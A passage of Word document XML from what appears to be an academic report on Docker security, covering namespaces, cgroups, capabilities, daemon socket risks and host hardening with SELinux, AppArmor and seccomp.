        <w:t>process, enabling each container to run using the processes ID in hierarchical order.</w:t>
      </w:r>
      <w:r w:rsidR="001A6904">
        <w:t xml:space="preserve"> This allows multiple containers </w:t>
      </w:r>
      <w:r w:rsidR="00287B1D">
        <w:t xml:space="preserve">to run </w:t>
      </w:r>
      <w:r w:rsidR="001A6904">
        <w:t xml:space="preserve">completely separated </w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t xml:space="preserve">from each other </w:t>
      </w:r>
      <w:r w:rsidR="001A6904">
        <w:t>using namespaces on a single host.</w:t>
      </w:r>
      <w:r w:rsidR="002A08F7">
        <w:t xml:space="preserve"> Namespaces also </w:t>
      </w:r>
      <w:r w:rsidR="004E4ADF">
        <w:t xml:space="preserve">enables </w:t>
      </w:r>
      <w:r w:rsidR="003C483C">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="00EC213E">
        <w:t xml:space="preserve">to communicate over a network by </w:t>
      </w:r>
      <w:r w:rsidR="00B951E0">
        <w:t>allocating</w:t>
      </w:r>
      <w:r w:rsidR="00EC213E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006273E4">
        <w:t>each container a unique IP address and hostname</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1566716286"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00CC193C">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00CC193C">
            <w:instrText xml:space="preserve"> CITATION AMJ15 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00CA2A12">
            <w:instrText xml:space="preserve"> \m EBa15</w:instrText>
          </w:r>
          <w:r w:rsidR="00CC193C">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[36, 37]</w:t>
          </w:r>
          <w:r w:rsidR="00CC193C">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="006E2926">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CDB55D" w14:textId="72F13F91" w:rsidR="00E2718C" w:rsidRDefault="00B07177" w:rsidP="00CB686E">
      <w:r>
        <w:t>On the other hand, Docker uses Cgroups to manage and allocate resources for each container.</w:t>
      </w:r>
      <w:r w:rsidR="006235BE">
        <w:t xml:space="preserve"> It helps limit and assign resources, such as memory, CPU, and disk I/O</w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006235BE">
        <w:t xml:space="preserve"> to each container</w:t>
      </w:r>
      <w:r w:rsidR="002A2AE3">
        <w:t xml:space="preserve"> by preventing a single container from exhausting all resources </w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="002A2AE3">
        <w:t xml:space="preserve">ensuring each container </w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>gets its allocated resources.</w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t xml:space="preserve"> For this reason, Cgroups </w:t>
      </w:r>
      <w:r w:rsidR="004A08CC">
        <w:t xml:space="preserve">are crucial to prevent denial of service (Dos) attacks on containers. </w:t>
      </w:r>
      <w:r w:rsidR="00055873">
        <w:t>They are</w:t>
      </w:r>
      <w:r w:rsidR="004A08CC">
        <w:t xml:space="preserve"> also </w:t>
      </w:r>
      <w:r w:rsidR="00055873">
        <w:t>helpful</w:t>
      </w:r>
      <w:r w:rsidR="004A08CC">
        <w:t xml:space="preserve"> to monitor the performance and resilienc</w:t>
      </w:r>
      <w:r w:rsidR="00F461DB">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="004A08CC">
        <w:t xml:space="preserve"> of applications on a cloud platform, especially on</w:t>
      </w:r>
      <w:r w:rsidR="00055873">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="004A08CC">
        <w:t xml:space="preserve"> multi-tenant cloud environment.</w:t>
      </w:r>
      <w:r w:rsidR="005059B5">
        <w:t xml:space="preserve"> Simply put, </w:t>
      </w:r>
      <w:r w:rsidR="007E14DF">
        <w:t xml:space="preserve">Cgroups </w:t>
      </w:r>
      <w:r w:rsidR="00EA15E5">
        <w:t xml:space="preserve">protects containers </w:t>
      </w:r>
      <w:r w:rsidR="005F6CF8">
        <w:t>from being exploited by limiting resource sharing</w:t>
      </w:r>
      <w:r w:rsidR="00DA1D57">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00351977">
        <w:t>among</w:t>
      </w:r>
      <w:r w:rsidR="00DA1D57">
        <w:t xml:space="preserve"> them</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="607698394"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00D8022A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D8022A">
            <w:instrText xml:space="preserve"> CITATION RRo14 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="007E008D">
            <w:instrText xml:space="preserve"> \m KOh19</w:instrText>
          </w:r>
          <w:r w:rsidR="00D8022A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[38, 39]</w:t>
          </w:r>
          <w:r w:rsidR="00D8022A">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00DA1D57">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EA15E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0507C49A" w14:textId="4D401A1A" w:rsidR="008142A4" w:rsidRDefault="00C072BE" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00E2718C">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uses </w:t>
      </w:r>
      <w:r w:rsidR="00D756C9">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00E52DB4">
        <w:t xml:space="preserve">Linux kernel capabilities feature </w:t>
      </w:r>
      <w:r w:rsidR="00E2718C">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00F96212">
        <w:t xml:space="preserve">limit </w:t>
      </w:r>
      <w:r w:rsidR="00C5690C">
        <w:t>the privilege of a process</w:t>
      </w:r>
      <w:r w:rsidR="00DA174A">
        <w:t xml:space="preserve"> to a minimum level when needed.</w:t>
      </w:r>
      <w:r w:rsidR="003A2901">
        <w:t xml:space="preserve"> By default, </w:t>
      </w:r>
      <w:r w:rsidR="00BA0E5F">
        <w:t>containers are designed to sta</w:t>
      </w:r>
      <w:r w:rsidR="00DA301C">
        <w:t xml:space="preserve">rt with a </w:t>
      </w:r>
      <w:r w:rsidR="0023614A">
        <w:t xml:space="preserve">confined </w:t>
      </w:r>
      <w:r w:rsidR="00F43BF0">
        <w:t xml:space="preserve">set of </w:t>
      </w:r>
      <w:r w:rsidR="00080362">
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00B07CF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00080362">
        <w:t>capabilit</w:t>
      </w:r>
      <w:r w:rsidR="00F43BF0">
        <w:t>ies</w:t>
      </w:r>
      <w:r w:rsidR="00BF5D7D">
        <w:t xml:space="preserve">. However, it also allows flexibility </w:t>
      </w:r>
      <w:r w:rsidR="00A95FA3">
        <w:t xml:space="preserve">for specific services </w:t>
      </w:r>
      <w:r w:rsidR="00CA3D86">
        <w:t>to start with root privilege when needed.</w:t>
      </w:r>
      <w:r w:rsidR="000D58E4">
        <w:t xml:space="preserve"> Usually, capabilities </w:t>
      </w:r>
      <w:r w:rsidR="00A04674">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00F83914">
        <w:t xml:space="preserve"> used to provide </w:t>
      </w:r>
      <w:r w:rsidR="006F56C7">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00431694">
        <w:t xml:space="preserve"> between non-root and root users.</w:t>
      </w:r>
      <w:r w:rsidR="00C70868">
        <w:t xml:space="preserve"> As a result, it can protect against privilege </w:t>
      </w:r>
      <w:r w:rsidR="00E50258">
        <w:t xml:space="preserve">and container break out attacks within </w:t>
      </w:r>
      <w:r w:rsidR="00EB2EB4">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00E50258">
        <w:t>Docker environment</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2091496474"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B8795D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B8795D">
            <w:instrText xml:space="preserve"> CITATION DHu19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B8795D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
          <w:r w:rsidR="00B8795D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E50258">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD315D5" w14:textId="5B5F343C" w:rsidR="00EA3BE6" w:rsidRDefault="001713B5" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">Further, </w:t>
      </w:r>
      <w:r w:rsidR="00684346">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00AF555C">
        <w:t>Docker daemon</w:t>
      </w:r>
      <w:r w:rsidR="006562A4">
        <w:t xml:space="preserve"> service</w:t>
      </w:r>
      <w:r w:rsidR="00AF555C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006562A4">
        <w:t>runs on the host machine</w:t>
      </w:r>
      <w:r w:rsidR="00912F92">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="006562A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00255028">
        <w:t xml:space="preserve">needs </w:t>
      </w:r>
      <w:r w:rsidR="009F348D">
        <w:t>root access</w:t>
      </w:r>
      <w:r w:rsidR="00D36777">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006A56C6">
        <w:t xml:space="preserve"> Th</w:t>
      </w:r>
      <w:r w:rsidR="00F1632C">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="006A56C6">
        <w:t xml:space="preserve"> feature </w:t>
      </w:r>
      <w:r w:rsidR="00A909AB">
        <w:t>could</w:t>
      </w:r>
      <w:r w:rsidR="006A56C6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC1BE9">
        <w:t xml:space="preserve">create </w:t>
      </w:r>
      <w:r w:rsidR="00F1632C">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="00213B36">
        <w:t>loopholes if it</w:t>
      </w:r>
      <w:r w:rsidR="00361A41">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="00213B36">
        <w:t xml:space="preserve"> used </w:t>
      </w:r>
      <w:r w:rsidR="00E77A78">
        <w:t>without careful consideration</w:t>
      </w:r>
      <w:r w:rsidR="001E523F">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00942914">
        <w:t>implications.</w:t>
      </w:r>
      <w:r w:rsidR="003007B9">
        <w:t xml:space="preserve"> For instance, Docker allows users to create </w:t>
      </w:r>
      <w:r w:rsidR="00C83DE7">
        <w:t xml:space="preserve">a shared volume between the host and </w:t>
      </w:r>
      <w:r w:rsidR="00516B30">
        <w:t xml:space="preserve">a container with </w:t>
      </w:r>
      <w:r w:rsidR="00086719">
        <w:t>full access and privilege.</w:t>
      </w:r>
      <w:r w:rsidR="00E97073">
        <w:t xml:space="preserve"> Therefore, </w:t>
      </w:r>
      <w:r w:rsidR="00585201">
        <w:t xml:space="preserve">a user can start a container from the host </w:t>
      </w:r>
      <w:r w:rsidR="00585201">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">directory </w:t>
      </w:r>
      <w:r w:rsidR="0037098C">
        <w:t xml:space="preserve">without any </w:t>
      </w:r>
      <w:r w:rsidR="00EC3ADC">
        <w:t>limitations.</w:t>
      </w:r>
      <w:r w:rsidR="00533255">
        <w:t xml:space="preserve"> Docker uses </w:t>
      </w:r>
      <w:r w:rsidR="00CE72A6">
        <w:t>a UNIX socket</w:t>
      </w:r>
      <w:r w:rsidR="00B66142">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E66CE4">
        <w:t>/var/run/docker</w:t>
      </w:r>
      <w:r w:rsidR="00B766CB">
        <w:t>.sock to</w:t>
      </w:r>
      <w:r w:rsidR="00074819">
        <w:t xml:space="preserve"> listen and </w:t>
      </w:r>
      <w:r w:rsidR="003F2FFB">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="00074819">
        <w:t xml:space="preserve">entry point </w:t>
      </w:r>
      <w:r w:rsidR="009763D1">
        <w:t xml:space="preserve">for API calls </w:t>
      </w:r>
      <w:r w:rsidR="00DF6B8E">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="005B6383">
        <w:t>root access</w:t>
      </w:r>
      <w:r w:rsidR="00BF1813">
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidR="005F0117">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF1813">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="005F0117">
        <w:t>his implies</w:t>
      </w:r>
      <w:r w:rsidR="00BF1813">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="005F0117">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="00DE6786">
        <w:t>malicious user</w:t>
      </w:r>
      <w:r w:rsidR="00602BEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F0117">
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="00664CD3">
        <w:t xml:space="preserve"> bypass </w:t>
      </w:r>
      <w:r w:rsidR="00564307">
        <w:t xml:space="preserve">through the </w:t>
      </w:r>
      <w:r w:rsidR="00DE6786">
        <w:t>REST API</w:t>
      </w:r>
      <w:r w:rsidR="00564307">
        <w:t xml:space="preserve"> to escalate </w:t>
      </w:r>
      <w:r w:rsidR="005F0117">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00DE6786">
        <w:t>conduct</w:t>
      </w:r>
      <w:r w:rsidR="00564307">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF00CF">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00564307">
        <w:t>privilege</w:t>
      </w:r>
      <w:r w:rsidR="00EF00CF">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00DE6786">
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r w:rsidR="00564307">
        <w:t xml:space="preserve"> within </w:t>
      </w:r>
      <w:r w:rsidR="00E8223E">
        <w:t>the Docker system</w:t>
      </w:r>
      <w:r w:rsidR="00780DE5">
        <w:t xml:space="preserve"> because of </w:t>
      </w:r>
      <w:r w:rsidR="00300087">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00780DE5">
        <w:t xml:space="preserve"> root privilege</w:t>
      </w:r>
      <w:r w:rsidR="00E8223E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C56CFE">
        <w:t xml:space="preserve"> However, Docker recommends </w:t>
      </w:r>
      <w:r w:rsidR="00B733C1">
        <w:t xml:space="preserve">not to </w:t>
      </w:r>
      <w:r w:rsidR="009268A3">
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidR="00B64394">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00B733C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B64394">
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00D13E49">
        <w:t xml:space="preserve"> Docker daemon socket </w:t>
      </w:r>
      <w:r w:rsidR="009268A3">
        <w:t xml:space="preserve">on the </w:t>
      </w:r>
      <w:r w:rsidR="005F7D3D">
        <w:t>loopback address (127.0.0.1)</w:t>
      </w:r>
      <w:r w:rsidR="00D90240">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0023499B">
        <w:t xml:space="preserve"> It is also a good practice </w:t>
      </w:r>
      <w:r w:rsidR="00F078A6">
        <w:t>to restrict access to the daemon socket</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2124528045"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="009077B9">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009077B9">
            <w:instrText xml:space="preserve"> CITATION doc212 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="003E4446">
            <w:instrText xml:space="preserve"> \m AMa18</w:instrText>
          </w:r>
          <w:r w:rsidR="009077B9">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[35, 41]</w:t>
          </w:r>
          <w:r w:rsidR="009077B9">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F078A6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED98B06" w14:textId="5808AE45" w:rsidR="004A6DE6" w:rsidRDefault="005B3F20" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">The security of Docker </w:t>
      </w:r>
      <w:r w:rsidR="00802BFB">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00107354">
        <w:t xml:space="preserve">includes </w:t>
      </w:r>
      <w:r w:rsidR="00E5762C">
        <w:t>assessing the various Docker components</w:t>
      </w:r>
      <w:r w:rsidR="00EF7171">
        <w:t xml:space="preserve">, including </w:t>
      </w:r>
      <w:r w:rsidR="006004C2">
        <w:t>host security, network, and others.</w:t>
      </w:r>
      <w:r w:rsidR="00D55ABE">
        <w:t xml:space="preserve"> The lists below </w:t>
      </w:r>
      <w:r w:rsidR="00987444">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00DB5CA0">
        <w:t xml:space="preserve">xplain the security measures </w:t>
      </w:r>
      <w:r w:rsidR="00B44183">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00DB5CA0">
        <w:t>Docker components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC96364" w14:textId="77777777" w:rsidR="00F22E47" w:rsidRDefault="00222FEA" w:rsidP="00E30A2D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc86859257"/>
      <w:r w:rsidRPr="00F22E47">
        <w:t xml:space="preserve">Host </w:t>
      </w:r>
      <w:r w:rsidR="00C14462" w:rsidRPr="00F22E47">
        <w:t>Hardening</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="6960728C" w14:textId="4D89BC8C" w:rsidR="007A51FA" w:rsidRDefault="00E009DF" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">The host kernel is shared among </w:t>
      </w:r>
      <w:r w:rsidR="002A2835">
        <w:t>multiple containers</w:t>
      </w:r>
      <w:r w:rsidR="0021219E">
        <w:t xml:space="preserve"> to run Docker applications. Therefore, </w:t>
      </w:r>
      <w:r w:rsidR="00B97693">
        <w:t xml:space="preserve">the host OS needs to be secured </w:t>
      </w:r>
      <w:r w:rsidR="006B2CA2">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00645F3C">
        <w:t xml:space="preserve"> order to</w:t>
      </w:r>
      <w:r w:rsidR="00B97693">
        <w:t xml:space="preserve"> protect containers from any security breaches.</w:t>
      </w:r>
      <w:r w:rsidR="00C37AC9">
        <w:t xml:space="preserve"> This includes</w:t>
      </w:r>
      <w:r w:rsidR="009A63DB">
        <w:t xml:space="preserve"> enabling </w:t>
      </w:r>
      <w:r w:rsidR="00E12EC2">
        <w:t xml:space="preserve">several </w:t>
      </w:r>
      <w:r w:rsidR="00472839">
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidR="00571BAE">
        <w:t xml:space="preserve"> Linux kernel</w:t>
      </w:r>
      <w:r w:rsidR="00472839">
        <w:t xml:space="preserve"> security modules</w:t>
      </w:r>
      <w:r w:rsidR="00571BAE">
        <w:t xml:space="preserve">, such as </w:t>
      </w:r>
      <w:r w:rsidR="00537EF9">
        <w:t>SELinux, seccomp, and AppArmor</w:t>
      </w:r>
      <w:r w:rsidR="0027153C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0094329D">
        <w:t xml:space="preserve"> With the latest version of Docker</w:t>
      </w:r>
      <w:r w:rsidR="006572FE">
        <w:t>, all th</w:t>
      </w:r>
      <w:r w:rsidR="000C4D2D">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="006572FE">
        <w:t xml:space="preserve">se security modules are </w:t>
      </w:r>
      <w:r w:rsidR="007A0A2C">
        <w:t xml:space="preserve">available by </w:t>
      </w:r>
      <w:r w:rsidR="00593D7D">
        <w:t>default,</w:t>
      </w:r>
      <w:r w:rsidR="00552A23">
        <w:t xml:space="preserve"> but </w:t>
      </w:r>
      <w:r w:rsidR="00642C99">
        <w:t xml:space="preserve">they </w:t>
      </w:r>
      <w:r w:rsidR="001C44B2">
        <w:t>need to be activated</w:t>
      </w:r>
      <w:r w:rsidR="007A0A2C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B50419">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="0088727B">
        <w:t xml:space="preserve">SELinux </w:t>
      </w:r>
      <w:r w:rsidR="008E70FF">
        <w:t>security architecture</w:t>
      </w:r>
      <w:r w:rsidR="005161A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A82E5C">
        <w:t xml:space="preserve">enforces </w:t>
      </w:r>
      <w:r w:rsidR="00452D79">
        <w:t xml:space="preserve">the files and processes created by </w:t>
      </w:r>
      <w:r w:rsidR="00207AF2">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="008C1B6D">
        <w:t xml:space="preserve">to run with restricted access </w:t>
      </w:r>
      <w:r w:rsidR="00CF6243">
        <w:t>within the</w:t>
      </w:r>
      <w:r w:rsidR="008C1B6D">
        <w:t xml:space="preserve"> host system</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-423804685"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="007A51FA">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007A51FA">
            <w:instrText xml:space="preserve"> CITATION HZh21 \l 2057  \m AEf20</w:instrText>
          </w:r>
          <w:r w:rsidR="007A51FA">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[42, 43]</w:t>
          </w:r>
          <w:r w:rsidR="007A51FA">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="008C1B6D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B629E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2B0E78" w14:textId="386C6D26" w:rsidR="00DC7E85" w:rsidRDefault="00B629E8" w:rsidP="00CB686E">
      <w:r>
        <w:t>Similarly, AppArmor (Application Armor)</w:t>
      </w:r>
      <w:r w:rsidR="000F7C06">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00131424">
        <w:t>helps to protect the host machine</w:t>
      </w:r>
      <w:r w:rsidR="003D5B82">
        <w:t xml:space="preserve"> OS and </w:t>
      </w:r>
      <w:r w:rsidR="00733F34">
        <w:t>its applications</w:t>
      </w:r>
      <w:r w:rsidR="00131424">
        <w:t xml:space="preserve"> from t</w:t>
      </w:r>
      <w:r w:rsidR="009059A9">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00131424">
        <w:t>reat actors</w:t>
      </w:r>
      <w:r w:rsidR="00733F34">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0015495D">
        <w:t xml:space="preserve"> It </w:t>
      </w:r>
      <w:r w:rsidR="001F43C8">
        <w:t xml:space="preserve">allows users to define policies </w:t>
      </w:r>
      <w:r w:rsidR="00CE1DC5">
        <w:t xml:space="preserve">to a specific </w:t>
      </w:r>
      <w:r w:rsidR="008B2231">
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="00CE1DC5">
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidR="00C00362">
        <w:t xml:space="preserve"> and t</w:t>
      </w:r>
      <w:r w:rsidR="00A57986">
        <w:t>he permissions they have.</w:t>
      </w:r>
      <w:r w:rsidR="00DF2151">
        <w:t xml:space="preserve"> Therefore, t</w:t>
      </w:r>
      <w:r w:rsidR="003E09D6">
        <w:t xml:space="preserve">he AppArmor </w:t>
      </w:r>
      <w:r w:rsidR="00E0549E">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="003E09D6">
        <w:t xml:space="preserve">policies </w:t>
      </w:r>
      <w:r w:rsidR="005A0188">
        <w:t xml:space="preserve">can be linked to </w:t>
      </w:r>
      <w:r w:rsidR="002C378F">
        <w:t>each application</w:t>
      </w:r>
      <w:r w:rsidR="00925B73">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00DB7A6E">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00925B73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB7A6E">
        <w:t>suitable</w:t>
      </w:r>
      <w:r w:rsidR="00556536">
        <w:t xml:space="preserve"> for restricting application </w:t>
      </w:r>
      <w:r w:rsidR="00C307E6">
        <w:t>access.</w:t>
      </w:r>
      <w:r w:rsidR="001011E6">
        <w:t xml:space="preserve"> By default, Docker applies the </w:t>
      </w:r>
      <w:r w:rsidR="00932463">
        <w:t xml:space="preserve">docker-default AppArmor security profile for </w:t>
      </w:r>
      <w:r w:rsidR="00AE275E">
        <w:t xml:space="preserve">running </w:t>
      </w:r>
      <w:r w:rsidR="00932463">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="00F06E18">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006E5459">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C0386E">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="006E5459">
        <w:t xml:space="preserve">owever, </w:t>
      </w:r>
      <w:r w:rsidR="00E12933">
        <w:t xml:space="preserve">users have permission to tweak or adjust </w:t>
      </w:r>
      <w:r w:rsidR="00D7210E">
        <w:t xml:space="preserve">the docker-default </w:t>
      </w:r>
      <w:r w:rsidR="004223DE">
        <w:t>to their needs.</w:t>
      </w:r>
      <w:r w:rsidR="006E5459">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC7E85">
        <w:t>In addition, th</w:t>
      </w:r>
      <w:r w:rsidR="00FB4507">
        <w:t xml:space="preserve">e seccomp </w:t>
      </w:r>
      <w:r w:rsidR="00037FE8">
        <w:t>is another Linux kernel f</w:t>
      </w:r>
      <w:r w:rsidR="00226161">
        <w:t xml:space="preserve">eature that </w:t>
      </w:r>
      <w:r w:rsidR="001C5C59">
        <w:t>helps</w:t>
      </w:r>
      <w:r w:rsidR="00E2200D">
        <w:t xml:space="preserve"> Docker run</w:t>
